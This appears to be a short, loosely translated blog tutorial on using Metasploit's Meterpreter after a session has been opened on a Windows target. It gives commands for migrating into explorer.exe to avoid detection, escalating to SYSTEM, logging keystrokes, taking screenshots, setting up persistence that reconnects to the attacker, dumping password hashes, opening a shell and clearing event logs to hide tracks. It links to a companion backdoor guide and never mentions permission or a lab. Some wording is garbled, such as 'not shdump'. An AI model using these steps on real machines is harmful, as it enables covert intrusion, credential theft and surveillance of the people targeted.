This tutorial aims to show how to use the Metasploit Framework to explore a target machine, in this tutorial we assume that u already opened a session in meterpreter, if you have not achieved can try some of our tips like this one: http://hernaneac.eti.br/2013/06/03/tutorial-kali-linux-como-criar-um-backdoor-para-controlar-pcs-remotamente/
After opening the session the best suggestion is to migrate from a more stable and it becomes more difficult to be detected vc so we need to list all processes available using the command ps
You will see a screen similar to this
Here you can view all running processes, one suggestion is to migrate from the explorer.exe process so we need to find the process in the list and see what the value of the PID then migrated to it using the command migrate 1708 (switch number 1708 by the number of your PID)
Here are some options now:
sysinfo - this command will show which version of windows target machine.
getsystem – Raises the level of privilege to SYSTEM
ipconfig – Shows the ip address of the target machine
screenshot – Saves a JPEG file with a print screen of the target computer
keyscan_start – Starts ie keylogger captures everything that is typed on the computer keyboard target
keyscan_dump - Displays data captured after keyscan_start.
keyscan_stop – To catch
run persistence -X - This command sets the target machine so that every system reboot it re-establish the connection to the attacker machine.
not shdump – does capture the password hashes from the target computer.
execute – Executes an application ex. execute -f calc.exe
shell – Open a command prompt
clearev - Cleans the Windows event logs, in other words, possible erases tracks left by vc.
Well this just gives a few tips that have to go a little playing kk.
Using the help command u can also find several other options.
I hope you enjoyed and until next